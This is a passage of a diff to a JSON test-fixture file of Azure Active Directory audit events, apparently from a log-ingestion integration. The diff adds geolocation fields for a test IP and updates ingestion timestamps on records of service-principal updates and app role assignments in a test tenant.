application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -15002,6 +15950,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -15155,7 +16115,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125297300Z", + "ingested": "2021-12-14T14:48:43.176734009Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -15182,6 +16142,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -15335,7 +16307,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125302100Z", + "ingested": "2021-12-14T14:48:43.176734648Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -15362,6 +16334,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -15515,7 +16499,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125306400Z", + "ingested": "2021-12-14T14:48:43.176735262Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -15542,6 +16526,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -15708,7 +16704,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125311600Z", + "ingested": "2021-12-14T14:48:43.176735870Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8071361Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622707\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"256e3859-87ca-4b23-b2c0-45a26ccd7925\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -15735,6 +16731,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -15901,7 +16909,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125318200Z", + "ingested": "2021-12-14T14:48:43.176736498Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 